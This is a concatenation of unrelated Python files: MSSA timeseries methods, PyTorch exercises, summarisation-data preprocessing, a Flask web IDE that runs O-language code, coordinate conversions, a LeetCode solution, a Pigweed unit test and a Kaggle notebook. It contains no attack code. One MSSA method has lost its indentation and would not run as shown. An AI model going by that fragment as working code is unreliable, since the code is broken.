    )
    if self.verbose:
        print('Calculating optimal reconstruction orders')
    ranks, rank_exp_var = self._calculate_optimal_reconstruction_orders(
        self.timeseries_,
        self.components_
    )
    self.component_ranks_ = ranks
    self.component_ranks_explained_variance_ = rank_exp_var
    # Default grouping: every component in its own group, per timeseries.
    self.component_groups_ = {
        ts_idx:[i for i in range(self.components_.shape[2])]
        for ts_idx in range(self.P_)
    }
    return self
@property
def hankel_weights_(self):
    '''Weights used for the weighted correlation between components.

    Derived from the hankelization structure (window size, trajectory
    matrix column count, and series length).'''
    return construct_hankel_weights(
        self.L_,
        self.K_,
        self.N_
    ).astype(float)
def w_correlation(self, ts_components):
    '''Return the w-correlation (weighted correlation) between components.

    The hankelization weights are required for an appropriate correlation
    measure: in the trajectory-matrix form of a timeseries, observations
    are repeated multiple times, and observations appearing in fewer
    "windows" of the trajectory matrix are downweighted relative to those
    that appear in many windows.'''
    return hankel_weighted_correlation(ts_components, self.hankel_weights_)
@property
def grouped_components_(self):
    # Dict of {timeseries index: (N, n_groups) matrix} built from
    # component_groups_; returns None until fit() has run.
    if getattr(self, 'component_groups_', None) is None:
        return None
    # For each timeseries, sum the component columns of each group into a
    # single column and stack the group columns side by side.
    # NB: components_[ts_idx, :, np.atleast_1d(group)] uses numpy advanced
    # indexing, which moves the selected component axis to the front —
    # hence the .T before summing over the group members (axis=1).
    _cgrouped = {
        ts_idx:np.concatenate([
            self.components_[ts_idx, :, np.atleast_1d(group)].T.sum(axis=1)[:, np.newaxis]
            for group in ts_cgroups
        ], axis=1)
        for ts_idx, ts_cgroups in self.component_groups_.items()
    }
    return _cgrouped
def _validate_component_group_assignment(self,
timeseries_index,
groups):
if getattr(self, 'component_groups_', None) is None:
raise Exception('MSSA must be fit before assigning component groups.')
if timeseries_index not in self.component_groups_:
raise Exception('timeseries_index not in {}'.format(self.component_groups_.keys()))
if not isinstance(groups, (list, tuple, np.ndarray)):
raise Exception('groups must be a list of lists (or int), with each sub-list component indices')
for group in groups:
group = np.atleast_1d(group)
for ind in group:
if ind not in np.arange(self.components_.shape[2]):
raise Exception('Component index {} not in valid range'.format(ind))
return True
def set_component_groups(self,
                         component_groups_dict):
    '''Assign component groupings for multiple timeseries via a dictionary.

    The dictionary must be in the format `{timeseries_index: groups}`,
    where `timeseries_index` is the column index of the timeseries and
    `groups` is a list of lists, each sublist holding the component
    indices belonging to that group. For example:

    `{
        0: [[0, 1, 2], [3], [4, 5], [6, 7, 8]],
        1: [[0], [1, 2], [3], [4, 5, 6]]
    }`

    Updates the `component_groups_` attribute; `grouped_components_`
    automatically reflects the change. Raises if fit has not been run yet,
    since there are no components until decomposition occurs. (After
    fitting, `component_groups_` defaults to one component per group, as if
    all components were independent.)

    Parameters
    ----------
    component_groups_dict : dict
        Dictionary with timeseries index as keys and list-of-list component
        index groupings as values.
    '''
    if not isinstance(component_groups_dict, dict):
        raise Exception('Must provide a dict with ts_index:groups as key:value pairs')
    # Validate every assignment before mutating anything.
    for ts_index, group_list in component_groups_dict.items():
        self._validate_component_group_assignment(ts_index, group_list)
    self.component_groups_.update(component_groups_dict)
    return self
def set_ts_component_groups(self,
                            timeseries_index,
                            groups):
    '''Assign component groupings for a single timeseries.

    Alternative to `set_component_groups`: takes the timeseries column
    index and a list of lists, each sublist holding the component indices
    for one group. For example:

    `mssa.set_ts_component_groups(1, [[0], [1, 2], [3], [4, 5, 6]])`

    Updates the `component_groups_` attribute for the given timeseries;
    `grouped_components_` automatically reflects the change. Raises if fit
    has not been run yet, since there are no components until decomposition
    occurs. (After fitting, `component_groups_` defaults to one component
    per group, as if all components were independent.)

    Parameters
    ----------
    timeseries_index : int
        Column index of the timeseries to update component groupings for.
    groups : list
        List of lists, where each sub-list is indices for components in
        that particular group.
    '''
    self._validate_component_group_assignment(timeseries_index, groups)
    self.component_groups_[timeseries_index] = groups
    return self
def forecast(self,
             timepoints_out,
             timeseries_indices=None,
             use_components=None):
    '''Forecast future timepoints using the recurrent forecasting formula.

    Parameters
    ----------
    timepoints_out : int
        How many timepoints to forecast out from the final observation given
        to fit in MSSA.
    timeseries_indices : None | int | numpy.ndarray
        If None, forecasting is done for all timeseries. If an int or array
        of integers is specified, only the forecasts for those timeseries
        are returned. (Internally the forecast is always computed for all
        timeseries and then filtered at the end.)
    use_components : None | int | numpy.ndarray
        Components to use in the forecast. If None, all components are
        used. If an int, that many top components are selected (e.g. 10
        means the first 10 components). If a numpy array, the components
        at those indices are used.
    '''
    # Normalize the component selection into an index array.
    if use_components is None:
        component_idx = np.arange(self.components_.shape[2])
    elif isinstance(use_components, int):
        component_idx = np.arange(use_components)
    else:
        component_idx = use_components
    forecasted = vmssa_recurrent_forecast(
        timepoints_out,
        self.components_,
        self.left_singular_vectors_,
        self.P_,
        self.L_,
        use_components=component_idx
    )
    # Optionally filter down to the requested timeseries rows.
    if timeseries_indices is None:
        return forecasted
    return forecasted[np.atleast_1d(timeseries_indices), :]
|
#!/usr/bin/env python
# coding: utf-8
import torch
import time
def exo1():
    # Build an 18x18 matrix of 1s, then overwrite a regular pattern of 2s
    # and 3s through raw storage views: each tensor below aliases x's
    # underlying storage (no copies), so fill_() writes directly into x.
    dalle_step = 5
    dalle_nb = 3
    matrix_size = dalle_step * dalle_nb + 3
    x = torch.full([matrix_size, matrix_size], 1)
    # Rows 1, 6, 11, 16 (every dalle_step-th row starting at row 1) -> 2s:
    # offset skips row 0; the row stride jumps dalle_step full rows.
    twos_line = torch.empty(0).set_(x.storage(),
        storage_offset=matrix_size,
        size=(dalle_nb+1, matrix_size),
        stride=(dalle_step * matrix_size, 1))
    twos_line.fill_(2)
    # Columns 1, 6, 11, 16 (every dalle_step-th column starting at 1) -> 2s.
    twos_column = torch.empty(0).set_(x.storage(),
        storage_offset=1,
        size=(matrix_size, dalle_nb+1),
        stride=(matrix_size, dalle_step))
    twos_column.fill_(2)
    # A dalle_nb x dalle_nb grid of 2x2 blocks of 3s, the first starting at
    # row 3 / column 3 and repeating every dalle_step rows/columns.
    threes_matrices = torch.empty(0).set_(x.storage(),
        storage_offset=(int((dalle_step + 1)/2)) * (1 + matrix_size),
        size=(dalle_nb, dalle_nb, 2, 2),
        stride=(matrix_size*dalle_step, dalle_step, matrix_size, 1))
    threes_matrices.fill_(3)
    print(x)
def exo2():
    """Print the eigenvalues of M^-1 D M for a random M and diagonal D.

    Similar matrices share eigenvalues, so the printed values should match
    the diagonal of D (1..20) up to numerical error.

    Bug fix: torch.eig was deprecated and has been removed from recent
    PyTorch releases; torch.linalg.eigvals is the supported replacement
    (it returns a complex tensor of eigenvalues).
    """
    m = torch.empty(20, 20)
    m.normal_()
    d = torch.diag(torch.FloatTensor(range(1, 21)))
    print(m)
    print(d)
    eigs = torch.linalg.eigvals(torch.inverse(m) @ d @ m)
    print(eigs)
def exo3():
    """Benchmark a large dense matmul and print throughput in GigaFlops.

    Returns the product matrix so the work cannot be optimized away."""
    size = 5000
    a = torch.empty([size, size]).normal_()
    b = torch.empty([size, size]).normal_()
    # Multiply-accumulate count of the naive size^3 matmul.
    flop_count = size**3
    start = time.perf_counter()
    product = torch.mm(a, b)
    elapsed = time.perf_counter() - start
    print("GigaFlops: {}".format(flop_count / (elapsed * 10**9)))
    return product
def mul_row(t):
    """Multiply each row i of a 2D tensor by (i + 1), element by element.

    Deliberately naive (Python double loop) so it can be timed against
    mul_row_fast below."""
    assert t.dim() == 2
    out = torch.empty(t.size())
    n_rows, n_cols = t.size(0), t.size(1)
    for row in range(n_rows):
        factor = row + 1
        for col in range(n_cols):
            out[row][col] = t[row][col] * factor
    return out
def mul_row_fast(t):
    """Vectorized mul_row: broadcast a (rows, 1) factor column over t."""
    assert t.dim() == 2
    factors = torch.arange(1.0, t.size(0) + 1).view(-1, 1)
    return factors * t
# Compare the naive and vectorized implementations on a 1000x400 tensor.
test_t = torch.empty(1000, 400).normal_()
t1 = time.perf_counter()
m1 = mul_row(test_t)
t2 = time.perf_counter()
m2 = mul_row_fast(test_t)
t3 = time.perf_counter()
# Norm of the difference should be ~0 if both implementations agree.
print("Correctness: {}".format(torch.norm(m2-m1)))
# ratio = speedup of the vectorized version over the naive loop.
print("T1 : {}, T2: {}, ratio: {}".format(t2 - t1, t3-t2, (t2-t1)/(t3-t2)))
|
from abc import ABC, abstractmethod
class AbstractEvaluationSuite(ABC):
    """Interface for evaluation suites.

    Concrete subclasses must implement :meth:`evaluate`, which scores a
    set of predictions against the corresponding ground truth.
    """

    @abstractmethod
    def evaluate(self, predictions, truth):
        """Score *predictions* against *truth*; implemented by subclasses."""
        raise NotImplementedError()
|
import struct
from newsroom import jsonl
import os
from utils import preprocess_text
import parameters as p
import pandas as pd
import pickle as pkl
from tensorflow.core.example import example_pb2
import argparse
def trim_and_transform(example_generator, new_filename, transformation, constraint):
    """Stream examples through *transformation*, keeping those that pass *constraint*.

    Surviving examples are appended to *new_filename* as gzipped jsonl
    (any existing file is replaced first). Prints a progress count every
    1000 input lines and the final old/new line counts."""
    total_read = 0
    total_kept = 0
    # Start from a clean output file.
    if os.path.isfile(new_filename):
        os.remove(new_filename)
    with jsonl.open(new_filename, gzip=True) as outfile:
        for example in example_generator:
            total_read += 1
            example = transformation(example)
            if constraint(example):
                total_kept += 1
                outfile.appendline(example)
            if total_read % 1000 == 0:
                print(total_read)
    print('# of old lines: %i, # of new lines: %i' % (total_read, total_kept))
def newsroom_constraint(line):
    """Keep only examples that have both a text and a summary."""
    return not (line['text'] is None or line['summary'] is None)
def newsroom_preprocess(line):
    """Run text preprocessing over the text/summary fields, preserving None."""
    def _maybe_preprocess(value):
        return preprocess_text(value) if value is not None else None
    return dict(text=_maybe_preprocess(line['text']),
                summary=_maybe_preprocess(line['summary']))
# # TODO: clean this up
# def cnn_preprocess(example_str):
# abstract = []
# article = []
# in_abstract = False
# in_article = False
# example_str = example_str.decode('utf-8', 'replace')
# example_str = example_str.replace('<s>', ' ')
# example_str = example_str.replace('</s>', ' . ')
# prev_c = None
# for c in example_str.split():
# if c == '.' and prev_c == c:
# continue
# if 'abstract' in c and c != 'abstract':
# in_abstract = True
# in_article = False
# continue
# if 'article' in c and c != 'article':
# in_abstract = False
# in_article = True
# continue
# c = c.replace('</s>', '.')
# if '<s>' in c: continue
# if '�' in c: continue
# if in_abstract:
# abstract.append(c)
# if in_article:
# article.append(c)
# prev_c = c
# pdb.set_trace()
# return dict(text=article, summary=abstract)
def cnn_preprocess(example_str):
    """Parse a serialized tensorflow Example into {'text', 'summary'} word lists.

    Returns None for both fields when either feature is missing or
    malformed, so cnn_constraint can filter the example out.
    """
    # convert to tensorflow example e
    e = example_pb2.Example.FromString(example_str)
    # extract text and summary
    try:
        # the article text was saved under the key 'article' in the data files
        article_text = e.features.feature['article'].bytes_list.value[0].decode().split(' ')
        # the abstract text was saved under the key 'abstract' in the data files
        abstract_text = e.features.feature['abstract'].bytes_list.value[0].decode().split(' ')
    except (ValueError, IndexError):
        # Bug fix: a missing feature yields an empty value list, so value[0]
        # raises IndexError, which the original `except ValueError` did not
        # catch and the example crashed instead of being filtered out.
        article_text = abstract_text = None
    return dict(text=article_text, summary=abstract_text)
def cnn_constraint(line):
    """Keep only examples where both article text and summary were parsed."""
    return all(line[key] is not None for key in ('text', 'summary'))
def pico_preprocess(line):
    """Map a CDSR dataframe row to text/P/I/O fields, preprocessing valid rows.

    Rows with NaN fields are returned unmodified; pico_constraint filters
    them out downstream."""
    mapped = dict(text=line.abstract, P=line.population, I=line.intervention, O=line.outcome)
    if not pico_constraint(mapped):
        return mapped
    return {key: preprocess_text(value) for key, value in mapped.items()}
def pico_constraint(line):
    """Reject rows where any field is NaN (x == x is False only for NaN)."""
    return all(line[key] == line[key] for key in ('text', 'P', 'I', 'O'))
def preprocess_newsroom_datafile(filename, new_filename):
    """Preprocess one gzipped newsroom jsonl file into a cleaned copy."""
    with jsonl.open(filename, gzip=True) as source:
        trim_and_transform(source, new_filename,
                           newsroom_preprocess, newsroom_constraint)
def preprocess_cnn_datafile(filename, new_filename):
    """Preprocess one CNN .bin file of length-prefixed serialized Examples."""
    def example_stream():
        # Records are stored as an 8-byte native-order length ('q') followed
        # by that many bytes of serialized Example proto.
        with open(filename, "rb") as handle:
            while True:
                header = handle.read(8)
                if not header:
                    break  # finished reading this file
                record_len = struct.unpack('q', header)[0]
                yield struct.unpack('%ds' % record_len, handle.read(record_len))[0]
    trim_and_transform(example_stream(), new_filename, cnn_preprocess, cnn_constraint)
def preprocess_pico_dataset(filename, new_filename_train, new_filename_dev,
                            new_filename_test, aspect_file,
                            train_end=30000, dev_end=40000):
    """Split the PICO csv into train/dev/test slices and preprocess each.

    Parameters
    ----------
    filename : str
        Path of the input csv file.
    new_filename_train, new_filename_dev, new_filename_test : str
        Output paths for the three preprocessed splits.
    aspect_file : str
        Path where the aspect list ['P','I','O'] is written.
    train_end : int, optional
        Row index where the train split ends (default 30000, as before;
        generalized from the previously hard-coded constant).
    dev_end : int, optional
        Row index where the dev split ends (default 40000, as before).
    """
    df = pd.read_csv(filename)

    def _row_stream(frame):
        # Yield rows one at a time so trim_and_transform can stream them.
        for _, row in frame.iterrows():
            yield row

    trim_and_transform(_row_stream(df[:train_end]), new_filename_train,
                       pico_preprocess, pico_constraint)
    trim_and_transform(_row_stream(df[train_end:dev_end]), new_filename_dev,
                       pico_preprocess, pico_constraint)
    trim_and_transform(_row_stream(df[dev_end:]), new_filename_test,
                       pico_preprocess, pico_constraint)
    with open(aspect_file, 'w') as aspectfile:
        aspectfile.write(str(['P','I','O']))
def preprocess_all_newsroom_dataset_files(folder):
    """Preprocess the train/val/test newsroom data files inside *folder*."""
    for split in ('train', 'val', 'test'):
        preprocess_newsroom_datafile(
            os.path.join(folder, split + '.data'),
            os.path.join(folder, split + '_processed.data'))
def preprocess_all_cnn_dataset_files(folder):
    """Preprocess the train/val/test CNN .bin files inside *folder*."""
    for split in ('train', 'val', 'test'):
        preprocess_cnn_datafile(
            os.path.join(folder, split + '.bin'),
            os.path.join(folder, split + '_processed.data'))
if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('dataset_type', help="Dataset to preprocess: 'newsroom' or 'cnn'.")
    parser.add_argument('data_folder', help='Folder containing the raw data files.')
    args = parser.parse_args()
    if args.dataset_type == 'newsroom':
        # for newsroom dataset
        preprocess_all_newsroom_dataset_files(args.data_folder)
    elif args.dataset_type == 'cnn':
        # for cnn dataset
        preprocess_all_cnn_dataset_files(args.data_folder)
    else:
        # Bug fix: the original bare `raise Exception` gave no indication of
        # what went wrong or which values are accepted.
        raise ValueError('Unknown dataset_type: %r (expected newsroom or cnn)'
                         % args.dataset_type)
    # IGNORE FOR NOW
    # for pico dataset
    # aspect_file = '/Volumes/JEREDUSB/aspects.txt'
    # filename = '/Volumes/JEREDUSB/pico_cdsr.csv'
    # new_filename_train = '/Volumes/JEREDUSB/train_processed.data'
    # new_filename_dev = '/Volumes/JEREDUSB/dev_processed.data'
    # new_filename_test = '/Volumes/JEREDUSB/test_processed.data'
    # preprocess_pico_dataset(filename, new_filename_train, new_filename_dev, new_filename_test, aspect_file)
    # with open(aspect_file, 'w') as aspectfile:
    #     aspectfile.write(str(['P','I','O']))
|
#!/usr/bin/env python
# NOTE: pass -d to this to print debugging info when the server crashes.
from flask import Flask, render_template, url_for, request
from subprocess import Popen, PIPE, CalledProcessError, check_call, check_output
import sys, os, string, glob, logging, pathlib
app = Flask(__name__)
app.logger.addHandler(logging.StreamHandler(sys.stdout))
app.logger.setLevel(logging.ERROR)
# Git commit hash for easy version checking.
# Prefer a baked-in version.txt (e.g. written at deploy time); otherwise fall
# back to `git describe` against the working copy.
version = ""
if os.path.isfile("version.txt"):
    with open("version.txt", "r") as f:
        version = f.readline().strip()
else:
    version = check_output(["git", "describe", "--tags", "--always"]).decode("utf-8")
def compileO():
    """(Re)build the O interpreter by running `make ide`.

    Raises RuntimeError when the build fails.

    Bug fix: subprocess.check_call raises CalledProcessError on a non-zero
    exit status and otherwise returns 0, so the original `if r != 0` branch
    was unreachable — and would have crashed anyway on the str + int
    concatenation in its print call.
    """
    try:
        check_call(['make', 'ide'])
    except CalledProcessError as exc:
        print("o.c could not be compiled. Error: %d" % exc.returncode)
        raise RuntimeError("Could not compile O interpreter") from exc
    print("o-ide: " + "".join(glob.glob("oide*")))
@app.route('/', methods=['GET', 'POST'])
def index():
    """Serve the IDE page; on POST, compile the interpreter if needed and run the submitted O code."""
    url_for('static', filename='logo.ico')
    if request.method != 'POST':
        return render_template('primary.html', version=version)
    # Check files that start with 'oide*' to see if C was compiled already.
    binaries = glob.glob("oide*")
    print(binaries)
    if len(binaries) < 1:
        print("Compiling O...")
        compileO()
    # Run code
    code = request.form['code']
    # Bug fix: the original `if input is None: input = ""` was dead code —
    # request.form['input'] raises on a missing key and .replace() never
    # returns None. Use .get() so a missing field genuinely defaults to ''.
    # (Local also renamed so it no longer shadows the builtin input().)
    stdin_text = request.form.get('input', '').replace('\r\n', '\n')
    print('Got code:', code, 'input:', stdin_text)
    print('Running O code...')
    p = Popen(['./oide', '-e', code], stdout=PIPE, stderr=PIPE, stdin=PIPE, universal_newlines=True)
    output, error = p.communicate(stdin_text)
    # Output to IDE: error page on non-zero exit, otherwise results page.
    if p.returncode:
        print('Output:', output, 'error:', error)
        return render_template('error.html', version=version, code=code, input=stdin_text, error=error)
    print('Output:', output, 'stack:', error)
    return render_template('code.html', version=version, code=code, input=stdin_text, output=output, stack=error or '[]')
@app.route('/link/')
@app.route('/link/<code>/')
@app.route('/link/<code>/<input>')
def link(code="IkVycm9yJTIwbGlua2luZyUyMGNvZGUibw==", input=""):
    # Render a shareable permalink page for a code/input pair. The default
    # `code` is a base64 payload (decodes to an "Error linking code" program)
    # shown when the URL carries no code segment.
    # NOTE(review): `input` shadows the builtin, but renaming it would change
    # the route parameter name, so it is kept.
    url_for('static', filename='logo.ico')
    print('Link:', code, input)
    return render_template('link.html', code=code, input=input)
if __name__ == '__main__':
    # Build the interpreter up front so the first request doesn't pay for it.
    print('Compiling O...')
    compileO()
    print('Starting server...')
    # Port 80 typically requires elevated privileges; pass -d on the command
    # line to enable Flask debug mode (see note at the top of the file).
    app.run(port=80, debug='-d' in sys.argv[1:])
|
from .tidyup_pandas_df import OpenFace, Librosa, downsample
from .findwav import findwav
from .features2db import create_db, create_connection, check_db_content, add_features
from .fragments import *
from .openface_aggregation import *
|
'''
----------------------------------------------------------------------------
coco.py
- Coordinate Conversions
2020/21/22
Mike Alexandersen & Matthew Payne & Matthew Holman
This module provides functionalities to perform coordinate conversions / rotations / shifts of frame
----------------------------------------------------------------------------
'''
# Import third-party packages
# -----------------------------------------------------------------------------
import sys
import numpy as np
# Import neighbouring packages
# -----------------------------------------------------------------------------
# old conversion library
from . import MPC_library as mpc
from .cheby_checker import Base
# Coordinate Conversion Functions
# -----------------------------------------------------------------------------
def ecliptic_to_equatorial(input, backwards=False):
    '''
    Rotates a cartesian vector or Cov-Matrix from mean ecliptic to mean equatorial.
    Backwards=True converts backwards, from equatorial to ecliptic.

    inputs:
    -------
    input : 2-D or 3-D arrays
    - If 2-D, then input.shape must be in (N_times,3) or (N_times,6)
    - If 3-D, then input.shape must be (N_times,6,6)
    NB: The inputs are 2D & 3D (rather than 1 or 2) so
    that we can "stack" lots of 1D vectors, or 2D Covariance-matrices

    output:
    -------
    output : np.ndarray
    - same shape as input
    '''
    # Ensure we have an array
    input = np.atleast_1d(input)
    # The rotation matrices we may use: R3 rotates a single 3-vector by the
    # obliquity of the ecliptic (sign flipped for the backwards direction);
    # R6 applies R3 block-diagonally to the position and velocity halves of
    # a 6-vector simultaneously.
    direction = -1 if backwards else +1
    R3 = mpc.rotate_matrix(mpc.Constants.ecl * direction)
    R6 = np.block( [ [R3, np.zeros((3,3))],[np.zeros((3,3)),R3] ])
    # Vector input => Single rotation operation
    # NB ... self.helio_ecl_vec.ndim ==2, self.helio_ecl_vec.shape = (N,6)
    if input.ndim == 2 and input.shape[1] in [3,6]:
        R = R6 if input.shape[1] == 6 else R3
        output = R.dot(input.T).T
    # Matrix (CoV) input => rotated as R C R^T
    # NB: CoV.ndim ==3 , CoV.shape == (N,6,6)
    # MJP 2022-02-6: Deliberately leaving as 6x6 to ensure Non-Gravs don't get passed in ...
    elif input.ndim == 3 and input.shape[1:] == (6,6):
        R = R6
        output = R @ input @ R.T
    # Unknown input
    else:
        sys.exit(f'Does not compute: input.ndim=={input.ndim} , input.shape={input.shape}')
    assert output.shape == input.shape
    return output
def equatorial_helio2bary(input_xyz, jd_tdb, backwards=False):
    '''
    Convert from heliocentric to barycentric cartesian coordinates.
    backwards=True converts backwards, from bary to helio.

    input:
        input_xyz - np.ndarray of shape (N_times,3) or (N_times,6)
        jd_tdb    - np.ndarray of shape (N_times)
        backwards - boolean

    output:
        output_xyz - np.ndarray
        - same shape as input_xyz:
          (N_times , 3) or (N_times , 6)

    input_xyz MUST BE EQUATORIAL!!!
    '''
    direction = -1 if backwards else +1
    # Ensure we have an array of the correct shape to work with
    assert input_xyz.ndim == 2, f" input_xyz={input_xyz}\n input_xyz.shape={input_xyz.shape}\n input_xyz.ndim={input_xyz.ndim}"
    assert input_xyz.shape[1] in [3,6]
    # Position & Motion of the barycenter w.r.t. the heliocenter (and vice-versa)
    # NB: delta.shape == (3,N_times) ==>> delta.T.shape == (N_times, 3)
    # TODO: use jpl_kernel with a public call on an Observatory object
    delta, delta_vel = mpc.jpl_kernel[0, 10].compute_and_differentiate(jd_tdb)
    # Work out whether we need xyz or xyzuvw: for 6-vectors the velocity
    # offset columns are appended to the position offset columns.
    delta = delta.T if input_xyz.shape[1] == 3 else np.block([delta.T,delta_vel.T])
    # Shift vectors & return: result.shape == (N_times , 3) or (N_times , 6)
    # The kernel offsets are divided by au_km to convert into AU.
    result = input_xyz + delta * direction / Base().au_km
    return result
|
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
    def addTwoNumbers(self, l1: ListNode, l2: ListNode) -> ListNode:
        """Add two non-negative numbers stored as linked lists of digits
        (least significant first) and return the sum as the same kind of
        list."""
        sentinel = ListNode(-1)  # placeholder head; real result starts at .next
        tail = sentinel
        carry = 0
        while l1 or l2:
            digit1 = l1.val if l1 else 0
            digit2 = l2.val if l2 else 0
            # divmod splits the column sum into next carry and stored digit.
            carry, digit = divmod(digit1 + digit2 + carry, 10)
            tail.next = ListNode(digit)
            tail = tail.next
            l1 = l1.next if l1 else None
            l2 = l2.next if l2 else None
        # A final carry adds one extra most-significant digit.
        if carry:
            tail.next = ListNode(1)
        return sentinel.next
|
# Copyright 2021 The Pigweed Authors
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""Tests for pw_console.console_app"""
import inspect
import logging
import unittest
from unittest.mock import MagicMock
from jinja2 import Environment, PackageLoader, make_logging_undefined
from prompt_toolkit.key_binding import KeyBindings
from pw_console.help_window import HelpWindow
# Shared Jinja environment used to load the keybind-list template for the
# mocked app; undefined template variables are routed through the
# 'pw_console' logger instead of raising.
_jinja_env = Environment(
    loader=PackageLoader('pw_console'),
    undefined=make_logging_undefined(logger=logging.getLogger('pw_console')),
    trim_blocks=True,
    lstrip_blocks=True,
)
def _create_app_mock():
    """Return a mock console app whose get_template() yields the keybind template."""
    keybind_template = _jinja_env.get_template('keybind_list.jinja')
    mock_app = MagicMock()
    mock_app.get_template = MagicMock(return_value=keybind_template)
    return mock_app
class TestHelpWindow(unittest.TestCase):
    """Tests for HelpWindow text and keybind lists."""

    def setUp(self):
        # Show full diffs on failure — useful for the long rendered strings
        # asserted below.
        self.maxDiff = None  # pylint: disable=invalid-name

    def test_instantiate(self) -> None:
        # HelpWindow should construct cleanly from a mocked app.
        app = _create_app_mock()
        help_window = HelpWindow(app)
        self.assertIsNotNone(help_window)

    # pylint: disable=unused-variable,unused-argument
    def test_add_keybind_help_text(self) -> None:
        # The handlers below are registered only so their docstrings and key
        # combos can be harvested into the help text; they are never invoked.
        bindings = KeyBindings()

        @bindings.add('f1')
        def show_help(event):
            """Toggle help window."""

        @bindings.add('c-w')
        @bindings.add('c-q')
        def exit_(event):
            """Quit the application."""

        app = _create_app_mock()
        help_window = HelpWindow(app)
        help_window.add_keybind_help_text('Global', bindings)
        # Expect docstring -> human-readable key-name lists, per section.
        self.assertEqual(
            help_window.help_text_sections,
            {
                'Global': {
                    'Quit the application.': ['Ctrl-Q', 'Ctrl-W'],
                    'Toggle help window.': ['F1'],
                }
            },
        )

    def test_generate_help_text(self) -> None:
        """Test keybind list template generation."""
        global_bindings = KeyBindings()

        @global_bindings.add('f1')
        def show_help(event):
            """Toggle help window."""

        @global_bindings.add('c-w')
        @global_bindings.add('c-q')
        def exit_(event):
            """Quit the application."""

        focus_bindings = KeyBindings()

        @focus_bindings.add('s-tab')
        @focus_bindings.add('c-right')
        @focus_bindings.add('c-down')
        def app_focus_next(event):
            """Move focus to the next widget."""

        @focus_bindings.add('c-left')
        @focus_bindings.add('c-up')
        def app_focus_previous(event):
            """Move focus to the previous widget."""

        app = _create_app_mock()
        help_window = HelpWindow(
            app,
            preamble='Pigweed CLI v0.1',
            additional_help_text=inspect.cleandoc("""
                Welcome to the Pigweed Console!
                Please enjoy this extra help text.
            """),
        )
        help_window.add_keybind_help_text('Global', global_bindings)
        help_window.add_keybind_help_text('Focus', focus_bindings)
        help_window.generate_help_text()
        # Rendered text must contain the preamble plus the extra help text...
        self.assertIn(
            inspect.cleandoc("""
                Pigweed CLI v0.1
                ================================ Help ===============================
                Welcome to the Pigweed Console!
                Please enjoy this extra help text.
            """),
            help_window.help_text,
        )
        # ...a banner per keybind section...
        self.assertIn(
            inspect.cleandoc("""
                ============================ Global Keys ============================
            """),
            help_window.help_text,
        )
        self.assertIn(
            inspect.cleandoc("""
                Toggle help window. ----------------- F1
                Quit the application. --------------- Ctrl-Q, Ctrl-W
            """),
            help_window.help_text,
        )
        self.assertIn(
            inspect.cleandoc("""
                ============================= Focus Keys ============================
            """),
            help_window.help_text,
        )
        # ...and the dotted keybind rows themselves.
        self.assertIn(
            inspect.cleandoc("""
                Move focus to the next widget. ------ BackTab, Ctrl-Down, Ctrl-Right
                Move focus to the previous widget. -- Ctrl-Left, Ctrl-Up
            """),
            help_window.help_text,
        )
# Allow running this test module directly (e.g. `python help_window_test.py`).
if __name__ == '__main__':
    unittest.main()
|
import numpy as np  # linear algebra
import pandas as pd  # data processing, CSV file I/O (e.g. pd.read_csv)
# Input data files are available in the "../input/" directory.
# For example, running this (by clicking run or pressing Shift+Enter) will list all files under the input directory
import os
for dirname, _, filenames in os.walk('/kaggle/input'):
    for filename in filenames:
        print(os.path.join(dirname, filename))
# NOTE(review): the imports below duplicate the ones above (notebook cells
# concatenated); `jit`/`cuda` from numba are never used in this script.
import pandas as pd
import numpy as np
import os
from numba import jit, cuda
os.getcwd()  # NOTE(review): return value discarded — leftover notebook cell
# Load the competition data.
# Bug fix: the original line read `train = train=pd.read_csv(...)`,
# a duplicated (chained) assignment left over from editing.
train = pd.read_csv("/kaggle/input/liverpool-ion-switching/train.csv")
train.shape
train.head()
test = pd.read_csv('/kaggle/input/liverpool-ion-switching/test.csv')
test.shape
test.head()
# Shift the test time axis back by 500 so it lines up with train's range.
test['time'] = (test['time'] - 500).round(4)
test.head()
train['signal'].describe()
def add_batch(data, batch_size):
    """Add a column 'batch_<batch_size>' labelling consecutive row blocks.

    Rows are numbered 0..n-1 in blocks of batch_size rows each; any trailing
    remainder rows keep the initial label 0. Mutates *data* in place."""
    column = 'batch_' + str(batch_size)
    data[column] = 0
    column_pos = data.columns.get_loc(column)
    n_batches = data.shape[0] // batch_size
    print('Batch size:', batch_size, 'Column name:', column, 'Number of batches:', n_batches)
    for batch_idx in range(n_batches):
        start = batch_idx * batch_size
        data.iloc[start:start + batch_size, column_pos] = batch_idx
# Tag both datasets with batch labels at several granularities.
for batch_size in [500000, 400000, 200000,100000]:
    add_batch(train, batch_size)
    add_batch(test, batch_size)
train.head()
# 'batch_500000' matches the original 500k-sample recording batches.
original_batch_column = 'batch_500000'
batch_columns = [c for c in train.columns if c.startswith('batch')]
batch_columns
# NOTE(review): batch_6 is computed but never used below.
batch_6 = train[train[original_batch_column] == 6]
def add_shifted_signal(data, shift):
    """Add a lag/lead copy of 'signal', shifted independently within each
    original batch so values never bleed across batch boundaries.

    Positive shift pads zeros at the batch start (column
    'shifted_signal_<shift>'); negative shift pads zeros at the batch end
    (column 'shifted_signal_minus_<|shift|>'). Mutates *data* in place."""
    for batch_id in data[original_batch_column].unique():
        mask = data[original_batch_column] == batch_id
        signal_values = data.loc[mask, 'signal'].values
        if shift > 0:
            shifted = np.concatenate((np.zeros(shift), signal_values[:-shift]))
            column = 'shifted_signal_' + str(shift)
        else:
            lead = -shift
            shifted = np.concatenate((signal_values[lead:], np.zeros(lead)))
            column = 'shifted_signal_minus_' + str(lead)
        data.loc[mask, column] = shifted
add_shifted_signal(train, -1)
add_shifted_signal(test, -1)
add_shifted_signal(train, 1)
add_shifted_signal(test, 1)
train.head()
y_train = train['open_channels'].copy()
x_train = train.drop(['time', 'open_channels'] + batch_columns, axis=1)
x_test = test.drop(['time'] + batch_columns, axis=1)
list(x_train.columns)
del train
del test
set(x_train.columns) ^ set(x_test.columns)
set()
from sklearn.preprocessing import StandardScaler
x_train = x_train.values
x_test = x_test.values
